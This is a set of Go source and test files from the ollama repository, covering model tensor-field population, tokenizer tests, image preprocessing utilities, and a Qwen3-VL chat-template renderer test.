		t.Run(tt.value, func(t *testing.T) {
			got := parseTag(tt.value)
			// Tag's fields are unexported, so cmp needs explicit permission
			if diff := cmp.Diff(tt.want, got, cmp.AllowUnexported((Tag{}))); diff != "" {
				t.Errorf("ParseTags() returned unexpected values (-want +got):\n%s", diff)
			}
		})
	}
}

// fakeBackend resolves tensor names from a fixed list, standing in for a real
// GGML backend in populateFields tests.
type fakeBackend struct {
	*ggml.Backend
	names []string
}

// fakeTensor is a named placeholder tensor returned by fakeBackend.Get.
type fakeTensor struct {
	*ggml.Tensor
	Name string
}

// Get returns a fakeTensor when name is in the backend's list, else nil
// (mirroring a missing tensor in a real model file).
func (m *fakeBackend) Get(name string) ml.Tensor {
	if slices.Contains(m.names, name) {
		return &fakeTensor{Name: name}
	}
	return nil
}

// TestPopulateFields verifies that populateFields wires tensors into nested
// struct fields (including fixed-size layer arrays) by their gguf tag names,
// leaving fields nil when no tensor exists (e.g. attn_o below).
func TestPopulateFields(t *testing.T) {
	type fakeLayer struct {
		Query  *nn.Linear `gguf:"attn_q"`
		Key    *nn.Linear `gguf:"attn_k"`
		Value  *nn.Linear `gguf:"attn_v"`
		Output *nn.Linear `gguf:"attn_o"`
	}
	type fakeModel struct {
		Input      *nn.Embedding `gguf:"input"`
		OutputNorm *nn.RMSNorm   `gguf:"output_norm"`
		Output     *nn.Linear    `gguf:"output"`
		Layers     [2]fakeLayer  `gguf:"blk"`
	}
	var m fakeModel
	v := reflect.ValueOf(&m)
	v.Elem().Set(populateFields(Base{b: &fakeBackend{
		names: []string{
			"input.weight",
			"blk.0.attn_q.weight", "blk.0.attn_k.weight", "blk.0.attn_v.weight",
			"blk.1.attn_q.weight", "blk.1.attn_k.weight", "blk.1.attn_v.weight",
			"output_norm.weight",
			"output.weight",
		},
	}}, v.Elem()))
	if diff := cmp.Diff(fakeModel{
		Input:      &nn.Embedding{Weight: &fakeTensor{Name: "input.weight"}},
		OutputNorm: &nn.RMSNorm{Weight: &fakeTensor{Name: "output_norm.weight"}},
		Output:     &nn.Linear{Weight: &fakeTensor{Name: "output.weight"}},
		Layers: [2]fakeLayer{
			{
				Query: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.attn_q.weight"}},
				Key:   &nn.Linear{Weight: &fakeTensor{Name: "blk.0.attn_k.weight"}},
				Value: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.attn_v.weight"}},
			},
			{
				Query: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.attn_q.weight"}},
				Key:   &nn.Linear{Weight: &fakeTensor{Name: "blk.1.attn_k.weight"}},
				Value: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.attn_v.weight"}},
			},
		},
	}, m); diff != "" {
		t.Errorf("populateFields() set incorrect values (-want +got):\n%s", diff)
	}
}

// TestPopulateFieldsAlternateName verifies the "alt:" fallback: when the
// primary tag name has no tensor, the alternative name is used (Output falls
// back to input.weight; Nested.Weight to nested.b.weight).
func TestPopulateFieldsAlternateName(t *testing.T) {
	type nested struct {
		Weight *nn.Linear `gguf:"a,alt:b"`
	}
	type fakeModel struct {
		Input  *nn.Embedding `gguf:"input"`
		Output *nn.Linear    `gguf:"output,alt:input"`
		Nested *nested       `gguf:"nested"`
		Tensor ml.Tensor     `gguf:"leaf,alt:tensor"`
	}
	var m fakeModel
	v := reflect.ValueOf(&m)
	v.Elem().Set(populateFields(Base{b: &fakeBackend{
		names: []string{
			"input.weight",
			"nested.b.weight",
			"leaf",
		},
	}}, v.Elem()))
	if diff := cmp.Diff(fakeModel{
		Input:  &nn.Embedding{Weight: &fakeTensor{Name: "input.weight"}},
		Output: &nn.Linear{Weight: &fakeTensor{Name: "input.weight"}},
		Nested: &nested{
			Weight: &nn.Linear{Weight: &fakeTensor{Name: "nested.b.weight"}},
		},
		Tensor: &fakeTensor{Name: "leaf"},
	}, m); diff != "" {
		t.Errorf("populateFields() set incorrect values (-want +got):\n%s", diff)
	}
}

// TestPopulateFieldsPrefixSuffixName verifies the "pre:" and "suf:" tag
// options, which wrap the leaf name (e.g. weight -> b_weight, weight_c,
// x_weight_y) instead of appending a dotted suffix.
func TestPopulateFieldsPrefixSuffixName(t *testing.T) {
	type fakeBlock struct {
		A  *nn.Linear `gguf:"a"`
		B  *nn.Linear `gguf:",pre:b_"`
		C  *nn.Linear `gguf:",suf:_c"`
		XY *nn.Linear `gguf:",pre:x_,suf:_y"`
	}
	type fakeModel struct {
		Blocks []fakeBlock `gguf:"blk"`
	}
	m := fakeModel{
		Blocks: make([]fakeBlock, 2),
	}
	v := reflect.ValueOf(&m)
	v.Elem().Set(populateFields(Base{b: &fakeBackend{
		names: []string{
			"blk.0.a.weight",
			"blk.0.b_weight",
			"blk.0.b_bias",
			"blk.0.weight_c",
			"blk.0.x_weight_y",
			"blk.1.a.weight",
			"blk.1.b_weight",
			"blk.1.b_bias",
			"blk.1.weight_c",
			"blk.1.x_weight_y",
		},
	}}, v.Elem()))
	if diff := cmp.Diff(fakeModel{
		Blocks: []fakeBlock{
			{
				A:  &nn.Linear{Weight: &fakeTensor{Name: "blk.0.a.weight"}},
				B:  &nn.Linear{Weight: &fakeTensor{Name: "blk.0.b_weight"}, Bias: &fakeTensor{Name: "blk.0.b_bias"}},
				C:  &nn.Linear{Weight: &fakeTensor{Name: "blk.0.weight_c"}},
				XY: &nn.Linear{Weight: &fakeTensor{Name: "blk.0.x_weight_y"}},
			},
			{
				A:  &nn.Linear{Weight: &fakeTensor{Name: "blk.1.a.weight"}},
				B:  &nn.Linear{Weight: &fakeTensor{Name: "blk.1.b_weight"}, Bias: &fakeTensor{Name: "blk.1.b_bias"}},
				C:  &nn.Linear{Weight: &fakeTensor{Name: "blk.1.weight_c"}},
				XY: &nn.Linear{Weight: &fakeTensor{Name: "blk.1.x_weight_y"}},
			},
		},
	}, m); diff != "" {
		t.Errorf("populateFields() set incorrect values (-want +got):\n%s", diff)
	}
}

// TestModelForArch verifies architecture dispatch, including the "_embed"
// variant selected when the config carries a pooling_type, and the error for
// unknown architectures. Note: it registers fake constructors in the
// package-level models map as a side effect.
func TestModelForArch(t *testing.T) {
	type fakeModel struct {
		Model
	}
	type fakeEmbeddingModel struct {
		Model
	}
	models["model"] = func(c fs.Config) (Model, error) {
		return fakeModel{}, nil
	}
	models["model_embed"] = func(c fs.Config) (Model, error) {
		return fakeEmbeddingModel{}, nil
	}
	cases := []struct {
		name   string
		config fs.Config
		want   any
		err    error
	}{
		{
			name: "model",
			config: fsggml.KV{
				"general.architecture": "model",
			},
			want: fakeModel{},
		},
		{
			name: "embedding",
			config: fsggml.KV{
				"general.architecture": "model",
				"model.pooling_type":   uint32(1),
			},
			want: fakeEmbeddingModel{},
		},
		{
			name: "unsupported",
			config: fsggml.KV{
				"general.architecture": "unsupported",
			},
			err: ErrUnsupportedModel,
		},
	}
	for _, tt := range cases {
		t.Run(tt.name, func(t *testing.T) {
			got, err := modelForArch(tt.config)
			if !errors.Is(err, tt.err) {
				t.Fatal(err)
			}
			if diff := cmp.Diff(tt.want, got); diff != "" {
				t.Errorf("modelForArch() returned unexpected values (-want +got):\n%s", diff)
			}
		})
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/textprocessor.go
model/textprocessor.go
package model

// Token type identifiers. Values start at 1 (iota + 1) and must not be
// reordered — they mirror the token-type values stored in model vocabularies
// and are compared against loaded metadata (see NewSentencePiece).
const (
	TOKEN_TYPE_NORMAL = iota + 1
	TOKEN_TYPE_UNKNOWN
	TOKEN_TYPE_CONTROL
	TOKEN_TYPE_USER_DEFINED
	TOKEN_TYPE_UNUSED
	TOKEN_TYPE_BYTE
)

// TextProcessor converts between text and token ids. Implementations in this
// package: BytePairEncoding, SentencePiece, and WordPiece.
type TextProcessor interface {
	// Encode tokenizes s; addSpecial controls whether configured
	// BOS/EOS-style markers are added around the result.
	Encode(s string, addSpecial bool) ([]int32, error)
	// Decode reconstructs text from token ids.
	Decode([]int32) (string, error)
	// Is reports whether a token id is the given special token.
	Is(int32, Special) bool
	// Vocabulary exposes the underlying vocabulary.
	Vocabulary() *Vocabulary
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/wordpiece_test.go
model/wordpiece_test.go
package model

import (
	"slices"
	"testing"

	"github.com/google/go-cmp/cmp"
)

// TestWordPiece round-trips a small uncased vocabulary: encoding lowercases
// and maps unknown-free words to prefix tokens with BOS/EOS ([CLS]/[SEP])
// added, and decoding restores readable text with punctuation re-attached.
func TestWordPiece(t *testing.T) {
	wpm := NewWordPiece(
		&Vocabulary{
			Values: []string{"[UNK]", "[CLS]", "[SEP]", "▁hello", "▁world", "s", "▁!", "▁@", "▁#"},
			AddBOS: true,
			AddEOS: true,
			BOS:    []int32{1},
			EOS:    []int32{2},
		},
		true, // lowercase
	)
	ids, err := wpm.Encode("Hello world!", true)
	if err != nil {
		t.Fatal(err)
	}
	// 1=[CLS] 3=▁hello 4=▁world 6=▁! 2=[SEP]
	if diff := cmp.Diff([]int32{1, 3, 4, 6, 2}, ids); diff != "" {
		t.Errorf("unexpected ids (-want +got):\n%s", diff)
	}
	words, err := wpm.Decode(ids)
	if err != nil {
		t.Fatal(err)
	}
	if diff := cmp.Diff("[CLS] hello world! [SEP]", words); diff != "" {
		t.Errorf("unexpected words (-want +got):\n%s", diff)
	}
}

// TestWordPieceWords exercises the word splitter directly: punctuation is
// kept as separate words and CJK ideographs each become their own word.
func TestWordPieceWords(t *testing.T) {
	var wpm WordPiece
	basic := slices.Collect(wpm.words("Hey friend!     How are you?!?"))
	if diff := cmp.Diff([]string{"Hey", "friend", "!", "How", "are", "you", "?", "!", "?"}, basic); diff != "" {
		t.Errorf("unexpected words (-want +got):\n%s", diff)
	}
	chinese := slices.Collect(wpm.words("野口里佳 Noguchi Rika"))
	if diff := cmp.Diff([]string{"野", "口", "里", "佳", "Noguchi", "Rika"}, chinese); diff != "" {
		t.Errorf("unexpected words (-want +got):\n%s", diff)
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/imageproc/images.go
model/imageproc/images.go
package imageproc

import (
	"image"
	"image/color"

	"golang.org/x/image/draw"
)

// Commonly used per-channel normalization constants (RGB mean / std).
var (
	ImageNetDefaultMean  = [3]float32{0.485, 0.456, 0.406}
	ImageNetDefaultSTD   = [3]float32{0.229, 0.224, 0.225}
	ImageNetStandardMean = [3]float32{0.5, 0.5, 0.5}
	ImageNetStandardSTD  = [3]float32{0.5, 0.5, 0.5}
	ClipDefaultMean      = [3]float32{0.48145466, 0.4578275, 0.40821073}
	ClipDefaultSTD       = [3]float32{0.26862954, 0.26130258, 0.27577711}
)

// Interpolation methods accepted by Resize.
const (
	ResizeBilinear = iota
	ResizeNearestNeighbor
	ResizeApproxBilinear
	ResizeCatmullrom
)

// Composite returns an image with the alpha channel removed by drawing over a white background.
func Composite(img image.Image) image.Image {
	white := color.RGBA{255, 255, 255, 255}
	return CompositeColor(img, white)
}

// CompositeColor returns an image with the alpha channel removed by drawing
// over a background filled with the given color.
func CompositeColor(img image.Image, color color.Color) image.Image {
	dst := image.NewRGBA(img.Bounds())
	// fill with the background color first, then alpha-blend the image on top
	draw.Draw(dst, dst.Bounds(), &image.Uniform{color}, image.Point{}, draw.Src)
	draw.Draw(dst, dst.Bounds(), img, img.Bounds().Min, draw.Over)
	return dst
}

// Resize returns an image which has been scaled to a new size.
// It panics when method is not one of the Resize* constants.
func Resize(img image.Image, newSize image.Point, method int) image.Image {
	dst := image.NewRGBA(image.Rect(0, 0, newSize.X, newSize.Y))
	kernels := map[int]draw.Interpolator{
		ResizeBilinear:        draw.BiLinear,
		ResizeNearestNeighbor: draw.NearestNeighbor,
		ResizeApproxBilinear:  draw.ApproxBiLinear,
		ResizeCatmullrom:      draw.CatmullRom,
	}
	kernel, ok := kernels[method]
	if !ok {
		panic("no resizing method found")
	}
	kernel.Scale(dst, dst.Rect, img, img.Bounds(), draw.Over, nil)
	return dst
}

// Pad returns an image which has been resized to fit within a new size, preserving aspect ratio, and padded with a color.
func Pad(img image.Image, newSize image.Point, color color.Color, kernel draw.Interpolator) image.Image {
	dst := image.NewRGBA(image.Rect(0, 0, newSize.X, newSize.Y))
	draw.Draw(dst, dst.Bounds(), &image.Uniform{color}, image.Point{}, draw.Src)
	// compute the centered letterbox rectangle that preserves aspect ratio
	var minPoint, maxPoint image.Point
	if img.Bounds().Dx() > img.Bounds().Dy() {
		// landscape: full width, vertically centered
		height := newSize.X * img.Bounds().Dy() / img.Bounds().Dx()
		minPoint = image.Point{0, (newSize.Y - height) / 2}
		maxPoint = image.Point{newSize.X, height + minPoint.Y}
	} else {
		// portrait (or square): full height, horizontally centered
		width := newSize.Y * img.Bounds().Dx() / img.Bounds().Dy()
		minPoint = image.Point{(newSize.X - width) / 2, 0}
		maxPoint = image.Point{minPoint.X + width, newSize.Y}
	}
	kernel.Scale(dst, image.Rectangle{
		Min: minPoint,
		Max: maxPoint,
	}, img, img.Bounds(), draw.Over, nil)
	return dst
}

// Normalize returns a slice of float32 containing each of the r, g, b values
// for an image normalized around a value. When channelFirst is true the
// output is plane-ordered (all R, then all G, then all B); otherwise values
// are interleaved per pixel (R, G, B, R, G, B, ...).
//
// NOTE(review): when rescale is false, the raw pixel values are never read —
// each channel normalizes 0 as (0-mean)/std. The package unit tests pin this
// behavior, so it appears intentional; confirm before "fixing".
func Normalize(img image.Image, mean, std [3]float32, rescale bool, channelFirst bool) []float32 {
	var pixelVals []float32
	bounds := img.Bounds()
	if channelFirst {
		var rVals, gVals, bVals []float32
		for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
			for x := bounds.Min.X; x < bounds.Max.X; x++ {
				c := img.At(x, y)
				// RGBA() returns 16-bit channels; >>8 reduces to 0..255
				r, g, b, _ := c.RGBA()
				var rVal, gVal, bVal float32
				if rescale {
					rVal = float32(r>>8) / 255.0
					gVal = float32(g>>8) / 255.0
					bVal = float32(b>>8) / 255.0
				}
				rVal = (rVal - mean[0]) / std[0]
				gVal = (gVal - mean[1]) / std[1]
				bVal = (bVal - mean[2]) / std[2]
				rVals = append(rVals, rVal)
				gVals = append(gVals, gVal)
				bVals = append(bVals, bVal)
			}
		}
		pixelVals = append(pixelVals, rVals...)
		pixelVals = append(pixelVals, gVals...)
		pixelVals = append(pixelVals, bVals...)
	} else {
		for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
			for x := bounds.Min.X; x < bounds.Max.X; x++ {
				c := img.At(x, y)
				r, g, b, _ := c.RGBA()
				var rVal, gVal, bVal float32
				if rescale {
					rVal = float32(r>>8) / 255.0
					gVal = float32(g>>8) / 255.0
					bVal = float32(b>>8) / 255.0
				}
				rVal = (rVal - mean[0]) / std[0]
				gVal = (gVal - mean[1]) / std[1]
				bVal = (bVal - mean[2]) / std[2]
				pixelVals = append(pixelVals, rVal, gVal, bVal)
			}
		}
	}
	return pixelVals
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/imageproc/images_test.go
model/imageproc/images_test.go
package imageproc

import (
	"image"
	"image/color"
	"image/draw"
	"reflect"
	"testing"
)

// createImage returns a width×height RGBA image uniformly filled with fillCol.
func createImage(width, height int, fillCol color.RGBA) image.Image {
	img := image.NewRGBA(image.Rect(0, 0, width, height))
	draw.Draw(img, img.Bounds(), &image.Uniform{fillCol}, image.Point{}, draw.Src)
	return img
}

// TestComposite verifies alpha removal: fully transparent pixels become the
// white background, opaque pixels pass through unchanged.
func TestComposite(t *testing.T) {
	tests := []struct {
		name         string
		img          image.Image
		expectedRGBA color.RGBA
	}{
		{
			name:         "Transparent image",
			img:          createImage(5, 5, color.RGBA{0, 0, 0, 0}),
			expectedRGBA: color.RGBA{255, 255, 255, 255},
		},
		{
			name:         "Solid red image",
			img:          createImage(5, 5, color.RGBA{255, 0, 0, 255}),
			expectedRGBA: color.RGBA{255, 0, 0, 255},
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			resultImg := Composite(tt.img)
			// Check the pixel values in the resulting image
			for x := range resultImg.Bounds().Dx() {
				for y := range resultImg.Bounds().Dy() {
					r, g, b, a := resultImg.At(x, y).RGBA()
					expectedR, expectedG, expectedB, expectedA := tt.expectedRGBA.RGBA()
					if r != expectedR || g != expectedG || b != expectedB || a != expectedA {
						t.Errorf("Pixel mismatch at (%d, %d): got (%d, %d, %d, %d), want (%d, %d, %d, %d)",
							x, y, r, g, b, a, expectedR, expectedG, expectedB, expectedA)
					}
				}
			}
		})
	}
}

// TestResize verifies the output dimensions for each interpolation method
// (content is not checked, only size).
func TestResize(t *testing.T) {
	tests := []struct {
		name     string
		img      image.Image
		newSize  image.Point
		method   int
		expected image.Point
	}{
		{
			name:     "Resize with bilinear interpolation",
			img:      createImage(5, 5, color.RGBA{255, 0, 0, 255}),
			newSize:  image.Point{10, 10},
			method:   ResizeBilinear,
			expected: image.Point{10, 10},
		},
		{
			name:     "Resize with nearest neighbor",
			img:      createImage(10, 10, color.RGBA{0, 255, 0, 255}),
			newSize:  image.Point{5, 5},
			method:   ResizeNearestNeighbor,
			expected: image.Point{5, 5},
		},
		{
			name:     "Resize with catmullrom",
			img:      createImage(1024, 1024, color.RGBA{0, 0, 255, 255}),
			newSize:  image.Point{10, 10},
			method:   ResizeCatmullrom,
			expected: image.Point{10, 10},
		},
		{
			name:     "Resize with approx bilinear",
			img:      createImage(1024, 768, color.RGBA{100, 100, 100, 255}),
			newSize:  image.Point{4, 3},
			method:   ResizeApproxBilinear,
			expected: image.Point{4, 3},
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			resizedImg := Resize(tt.img, tt.newSize, tt.method)
			if resizedImg.Bounds().Dx() != tt.expected.X || resizedImg.Bounds().Dy() != tt.expected.Y {
				t.Errorf("Unexpected size for resized image: got (%d, %d), want (%d, %d)",
					resizedImg.Bounds().Dx(), resizedImg.Bounds().Dy(), tt.expected.X, tt.expected.Y)
			}
		})
	}
}

// TestResizeInvalidMethod verifies that an unknown method panics.
func TestResizeInvalidMethod(t *testing.T) {
	defer func() {
		if r := recover(); r == nil {
			t.Errorf("Expected panic for invalid resizing method, but did not panic")
		}
	}()
	img := createImage(10, 10, color.RGBA{0, 0, 0, 255})
	Resize(img, image.Point{5, 5}, -1)
}

// TestNormalize pins Normalize's output for rescale/channel-order
// combinations, including the no-rescale case where raw pixel values are
// ignored and only (0-mean)/std is emitted.
func TestNormalize(t *testing.T) {
	tests := []struct {
		name         string
		img          image.Image
		mean         [3]float32
		std          [3]float32
		rescale      bool
		channelFirst bool
		expected     []float32
	}{
		{
			name:         "Rescale with channel first",
			img:          createImage(2, 2, color.RGBA{128, 128, 128, 255}),
			mean:         ImageNetStandardMean,
			std:          ImageNetStandardSTD,
			rescale:      true,
			channelFirst: true,
			expected: []float32{
				0.003921628, 0.003921628, 0.003921628, 0.003921628, // R values
				0.003921628, 0.003921628, 0.003921628, 0.003921628, // G values
				0.003921628, 0.003921628, 0.003921628, 0.003921628, // B values
			},
		},
		{
			name:         "Rescale without channel first",
			img:          createImage(2, 2, color.RGBA{255, 0, 0, 255}),
			mean:         [3]float32{0.0, 0.0, 0.0},
			std:          [3]float32{1.0, 1.0, 1.0},
			rescale:      true,
			channelFirst: false,
			expected: []float32{
				1.0, 0.0, 0.0,
				1.0, 0.0, 0.0,
				1.0, 0.0, 0.0,
				1.0, 0.0, 0.0,
			},
		},
		{
			name:         "No rescale with mean/std adjustment",
			img:          createImage(2, 2, color.RGBA{100, 150, 200, 255}),
			mean:         ClipDefaultMean,
			std:          ClipDefaultSTD,
			rescale:      false,
			channelFirst: false,
			// (0 - mean) / std per channel, independent of the pixel data
			expected: []float32{
				-1.7922626, -1.7520971, -1.4802198,
				-1.7922626, -1.7520971, -1.4802198,
				-1.7922626, -1.7520971, -1.4802198,
				-1.7922626, -1.7520971, -1.4802198,
			},
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result := Normalize(tt.img, tt.mean, tt.std, tt.rescale, tt.channelFirst)
			if !reflect.DeepEqual(result, tt.expected) {
				t.Errorf("Test %s failed: got %v, want %v", tt.name, result, tt.expected)
			}
		})
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3vl_thinking_test.go
model/renderers/qwen3vl_thinking_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestQwen3VLThinkingRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message images []api.ImageData tools []api.Tool expected string }{ { name: "basic", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Hello, how are you?<|im_end|> <|im_start|>assistant <think> `, }, { name: "With thinking, end assistant.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc", Thinking: "To make this story interesting, I will speak in poetry."}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant <think> To make this story interesting, I will speak in poetry. </think> abc`, }, { name: "With thinking, end assistant.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Thinking: "To make this story interesting, I will speak in poetry."}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant <think> To make this story interesting, I will speak in poetry.`, }, { name: "Multiple thinking", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc", Thinking: "To make this story interesting, I will speak in poetry.<think>And I will speak in poetry after the first sentence.</think>"}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant <think> To make this story interesting, I will speak in poetry.<think>And I will speak in poetry after the first sentence.</think> </think> abc`, // NOTE: the second thinking tag is not captured }, { name: "Multiple thinking, multiple messages.", msgs: []api.Message{ 
{Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Thinking: "To make this story interesting, I will speak in poetry.", Content: "abc"}, {Role: "user", Content: "What is the weather like in San Francisco?"}, {Role: "assistant", Thinking: "Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence."}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<|im_end|> <|im_start|>user What is the weather like in San Francisco?<|im_end|> <|im_start|>assistant <think> Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence.`, }, // NOTE: Servers automatically prepend a [img-<n>] tag // { // name: "Image", // msgs: []api.Message{ // {Role: "user", Content: "Describe this image.", Images: []api.ImageData{api.ImageData(IMAGE2_BASE64)}}, // }, // expected: `<|im_start|>user // [img-0]Describe this image.<|im_end|> // <|im_start|>assistant // <think> // `, // }, // NOTE: Servers automatically prepend a [img-<n>] tag // { // name: "Multiple images", // msgs: []api.Message{ // {Role: "user", Content: "Describe these images.", Images: []api.ImageData{api.ImageData(IMAGE1_BASE64), api.ImageData(IMAGE2_BASE64)}}, // }, // expected: `<|im_start|>user // [img-0][img-1]Describe these images.<|im_end|> // <|im_start|>assistant // <think> // `, // }, // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "with tools and response", // msgs: []api.Message{ // {Role: "system", Content: "You are a helpful assistant with access to tools."}, // {Role: "user", Content: "What's the weather like in New York?"}, // { // Role: "assistant", // Content: "I'll check the weather in New York for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "get-current-weather", // Arguments: testArgs(map[string]any{ // "location": "New York", // "unit": "fahrenheit", // }), 
// }, // }, // }, // }, // {Role: "tool", Content: "80", ToolName: "get-current-weather"}, // {Role: "user", Content: "That sounds nice! What about San Francisco?"}, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "get-current-weather", // Description: "Get the current weather for a location", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"location"}, // Properties: testPropsMap(map[string]api.ToolProperty{ // "location": { // Type: api.PropertyType{"string"}, // Description: "The city and state, e.g. San Francisco, CA", // }, // "unit": { // Type: api.PropertyType{"string"}, // Enum: []any{"celsius", "fahrenheit"}, // Description: "The temperature unit", // }, // }), // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. // You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "get-current-weather", "description": "Get the current weather for a location", "parameters": {"type": "object", "properties": {"location": {"type": "string", "description": "The city and state, e.g. San Francisco, CA"}, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"], "description": "The temperature unit"}}, "required": ["location"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // What's the weather like in New York?<|im_end|> // <|im_start|>assistant // I'll check the weather in New York for you. 
// <tool_call> // {"name": "get-current-weather", "arguments": {"location": "New York", "unit": "fahrenheit"}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 80 // </tool_response><|im_end|> // <|im_start|>user // That sounds nice! What about San Francisco?<|im_end|> // <|im_start|>assistant // <think> // `, // }, // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "With tools and response, multiple tool calls", // msgs: []api.Message{ // { // Role: "system", // Content: "You are a helpful assistant with access to tools.", // }, // { // Role: "user", // Content: "Call two tools for me: add and multiply.", // }, // { // Role: "assistant", // Content: "Sure, I'll call both tools for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "add", // Arguments: testArgs(map[string]any{ // "a": 2, // "b": 3, // }), // }, // }, // { // Function: api.ToolCallFunction{ // Name: "multiply", // Arguments: testArgs(map[string]any{ // "x": 4, // "y": 5, // }), // }, // }, // }, // }, // { // Role: "tool", // Content: "5", // ToolName: "add", // }, // { // Role: "tool", // Content: "20", // ToolName: "multiply", // }, // { // Role: "user", // Content: "Thanks! 
What are the results?", // }, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "add", // Description: "Add two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"a", "b"}, // Properties: testPropsMap(map[string]api.ToolProperty{ // "a": {Type: api.PropertyType{"integer"}, Description: "First number"}, // "b": {Type: api.PropertyType{"integer"}, Description: "Second number"}, // }), // }, // }, // }, // { // Type: "function", // Function: api.ToolFunction{ // Name: "multiply", // Description: "Multiply two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"x", "y"}, // Properties: testPropsMap(map[string]api.ToolProperty{ // "x": {Type: api.PropertyType{"integer"}, Description: "First factor"}, // "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"}, // }), // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. 
// You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "add", "description": "Add two numbers", "parameters": {"type": "object", "properties": {"a": {"type": "integer"}, "b": {"type": "integer"}}, "required": ["a", "b"]}}} // {"type": "function", "function": {"name": "multiply", "description": "Multiply two numbers", "parameters": {"type": "object", "properties": {"x": {"type": "integer"}, "y": {"type": "integer"}}, "required": ["x", "y"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // Call two tools for me: add and multiply.<|im_end|> // <|im_start|>assistant // Sure, I'll call both tools for you. // <tool_call> // {"name": "add", "arguments": {"a": 2, "b": 3}} // </tool_call> // <tool_call> // {"name": "multiply", "arguments": {"x": 4, "y": 5}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 5 // </tool_response> // <tool_response> // 20 // </tool_response><|im_end|> // <|im_start|>user // Thanks! 
What are the results?<|im_end|> // <|im_start|>assistant // <think> // `, // }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Qwen3VLRenderer{isThinking: true}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } } func TestFormatToolCallArgumentThinkingVL(t *testing.T) { tests := []struct { name string arg any expected string }{ { name: "string", arg: "foo", expected: "foo", }, { name: "map", arg: map[string]any{"foo": "bar"}, expected: "{\"foo\":\"bar\"}", }, { name: "number", arg: 1, expected: "1", }, { name: "boolean", arg: true, expected: "true", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := formatToolCallArgument(tt.arg) if got != tt.expected { t.Errorf("formatToolCallArgument(%v) = %v, want %v", tt.arg, got, tt.expected) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
